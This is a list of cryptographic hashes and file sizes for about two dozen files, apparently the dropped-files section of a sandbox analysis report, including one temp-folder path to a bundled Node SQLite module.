  MD5    14a9867ec0265ebf974e440fcd67d837
  SHA1   ae0e43c2daf4c913f5db17f4d9197f34ab52e254
  SHA256 cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
  SHA512 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Filesize 2KB
  MD5    2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1   445bf1b07223a04f8a159581a3d37d630273010f
  SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Filesize 1KB
  MD5    7ab00d2b8ad3a0a8426f6a535086b700
  SHA1   5b912f4345328372093354ff2ba6a932fef4a8ab
  SHA256 cc27d1633ff5a4401c75569e6cd8f98e7ab09f01b8dfb0399f82efe197e0ca0c
  SHA512 839e5fbdcc406cee2f37a156ccbb772a80a0231508a7925f95e162990b31ea8366442fcd6073c9035905b47a34d60a3434cc776babf9d49521663b8d3e400584

Filesize 1KB
  MD5    f3cd8388e5c7649ad8b70b7a49771f04
  SHA1   4ee1ab6ceed21da37d35c10d20f8e918ad3eb91c
  SHA256 a38d547a402f133cc0c877c3dad8de7600e3957e4f5a3ad555eb00a9604e063c
  SHA512 119fb0547c47892904cdd170b4db15841867122af1b7715e43934968aa0d8328b7c0183609f95068243f0d81c3f2cfbd9b008385cc8f91e484bf67cc6eb9f70b

Filesize 1KB
  MD5    5fcfa95543a7088c79ff4dd7ce6cd352
  SHA1   5fc2045faf1c35ebf32907a4b8cf76874fd31f43
  SHA256 e11655e31ad254ca1490f992e8044548acd1c0c19003bebfc8e41320e03aad8e
  SHA512 b99a12c3c46a3b4e5cd5ba65c933fbbff35d567ea182c0b3902479605898e21f3c245f7f50736f1d16f8449d251b1bdaefe5b3cc060902095a22b27334e4b385

Filesize 944B
  MD5    63c760db3618dea9753509d96a7b0628
  SHA1   5dd25f1a3b25068679a6b4255500383dc1e3c6be
  SHA256 3d55aedc66fe55420c0bee9b388494902ea61ed6a7887f9ae6412ff924015d85
  SHA512 0bbc5ac692e7fbe6d1d488a32179754349218175b25bc71c8d576a42cf18dc64409f17e150af02eae2e1ac4ddf463bd4429bfc5e6d9f5c531d854b1ea86f1b68

Filesize 944B
  MD5    34f595487e6bfd1d11c7de88ee50356a
  SHA1   4caad088c15766cc0fa1f42009260e9a02f953bb
  SHA256 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
  SHA512 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Filesize 64B
  MD5    e7a9b063d3393ef3751a6a1fc8690350
  SHA1   6733c587eb503b127b277f2fd9ed481aa04743ab
  SHA256 1a08ae3a838cd48be72028d645a809023f265b4c6e89b0bd1b9e3f1c0448f018
  SHA512 d595b512830fddcfb022cac7588a01b56a9ca3960663ca99ca1f5c7bd86bcc1b49be9b298db4d25eec7c9561f11038dc9e62288e559ec843c39ef35d44e91d54

Filesize 64B
  MD5    446dd1cf97eaba21cf14d03aebc79f27
  SHA1   36e4cc7367e0c7b40f4a8ace272941ea46373799
  SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
  SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Filesize 2KB
  MD5    9161beb967c9aa0acb2e15b0e8a229fa
  SHA1   3380743736ad0f9acb57f32f0c28c415a2e09a9c
  SHA256 4adf851c1a3a8d5c55f904819f9a4d86f1d67c869a01cca6faa731d4889204ba
  SHA512 d99999a1ec7d28916dac5679a47f23c61d3520683aa97910c95fce6a924558fc076f38b6b74646b08737aa7d8c7fb5ed1a5dad058c00ace38f5005896463427a

Filesize 1KB
  MD5    8908e4a87d1b2ec130c50f3108630438
  SHA1   137afe9334a2e4d813335960ba55809978705c05
  SHA256 6f3a2eaf57818062f850c3996cc8393d3ce570907d64468ff13716c3d89c80aa
  SHA512 e56fe9705f0f80ed5382893b0b47f6fd3338e63129d49a08004a2ee11ab48098fe8a8937b49ca506443ddeb0961f366c1e6cffc0f32e1b220b8f5d66806f7c18

Filesize 1KB
  MD5    a8219c5824bb0733505eecd9093ce453
  SHA1   d7129bba90c6dae9eae89223317f253d5b65fcd3
  SHA256 935006461a21ed914a1275f385123243ac8769c8c653223b19306e930b97845c
  SHA512 89f82cab329826cffc050d5783d7a88ab9bcf78104abeaa56dc67f9660569e7fad2001dc992be50d5bfa6c12d247a72f486514148e40e7b28af12711f38c04eb

Filesize 60B
  MD5    d17fe0a3f47be24a6453e9ef58c94641
  SHA1   6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
Filesize 1.8MB
  MD5    66a65322c9d362a23cf3d3f7735d5430
  SHA1   ed59f3e4b0b16b759b866ef7293d26a1512b952e
  SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
  SHA512 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Filesize 3KB
  MD5    c3c3f0a06c21270d7eff04149efbfae2
  SHA1   b1b46f675b021d8ef431fc5a550c3bc7b7a2e5ec
  SHA256 3a02a26482dbf5d3c75192260945c239969749fc6351716e360c1c8a3bb761b8
  SHA512 1608c0b41193c1db52611697a0ea4cba1d41cf5eb58bf32da3f5e6e4b692c368b0b6a340e642d26b3d99c358b7b211c12b997aa6f56f7c679c0e1ef86b8e81a3

Filesize 379B
  MD5    18047e197c6820559730d01035b2955a
  SHA1   277179be54bba04c0863aebd496f53b129d47464
  SHA256 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
  SHA512 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Filesize 37.6MB
  MD5    8eacf3f9be7e3735352c4020fc4e05e9
  SHA1   0bb6c048d9e683e152de21f7d368a4c151095504
  SHA256 4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e
  SHA512 2f5c54c4561f14fbf9a58075dffe268247f3af3408084c12a8a7ed0fbb33f01448e85a06ba684b037e0489fbcbb7481a825cf23785c7b7c1d60c28467825e3f0

Filesize 3KB
  MD5    5330dbb4051e20be6a6c57ab45914b30
  SHA1   38be3f5c5c19db2157a974e112c1dff735bc73c2
  SHA256 a191ebe8871e5a885cf1fffd0f7797b818232c7040f500b42f15b517b7ce6ef0
  SHA512 832a8704b77cda5eddbe67d1fa815126cb5bce8458b74964b435ba9ca713ade9d6309b998d020acd8e8cd290b587f85a7245dfb5f44813954a0679b482845425

Filesize 652B
  MD5    7b75c3d38609f2bee985c3811780ca3b
  SHA1   d762fa62c6cb6d82ff6cf9910298397d74c697a3
  SHA256 5f59b8d900c92fc4a76d47220f07b178d5e756f6a2e859a35594ae233fb54cb7
  SHA512 528c5d44d27210051d2f4eede5c8ac80d86a5f2e0c2da9cb397845279910b01f4f255eeb175ded156bbc7f0e25bae701ef22e6d116b2b4a5bbc5cdfc4b6f007d

Filesize 426B
  MD5    b462a7b0998b386a2047c941506f7c1b
  SHA1   61e8aa007164305a51fa2f1cebaf3f8e60a6a59f
  SHA256 a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
  SHA512 eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Filesize 369B
  MD5    612d7691845dcca328abed62daf862ab
  SHA1   6ce6460dfa320bb10f689d2de40fddf787a6c21e
  SHA256 55249b0a52e80b63ccecd9605a761adf427e096961c0314ae4be10297d7dc0b7
  SHA512 c16c428d4a96b2de29e80c9e940e16d3a094dd5cb5ce22d8ecb3bea19127b872ce57a48954e470944da09863ab6376d61df26aa9d01a3ae6866d2d31b06a0907

Filesize 652B
  MD5    87364a0949a2739b7b934329641c05e0
  SHA1   1cbf6c3b45d48b14b9dc5547def566116a0399c8
  SHA256 7ebb085db5016166a8423248685f7af202a76413371c6c849a0e606f7e9f8fc4
  SHA512 6ee065df9994edb63b10bc6ac74d4e6b25329b20db3cfcc67d5c89705e4d69331198e8d96405eea27a57471040c63b40cd2284cefbc3ae6b6488636437cc4861

Filesize 311B
  MD5    7bc8de6ac8041186ed68c07205656943
  SHA1   673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
  SHA256 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
  SHA512 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

Filesize 369B
  MD5    a0fa0bd7e2618d7837e111027d46544e
  SHA1   ed7bf2162c754daa5bb64e2e312d5d181ce61923
  SHA256 c4cd39396a05f86052a13d2874333d4ee9c9690e0659f32d2ea2ae4e4104bdb7
  SHA512 0e8b94a028b488d44a457f26e398c241e70af12f916915da4bf969cee15b0717999cae8c148afbca0b1ba038a0f0b0cf130040edb7a402712cf7233e511ce45d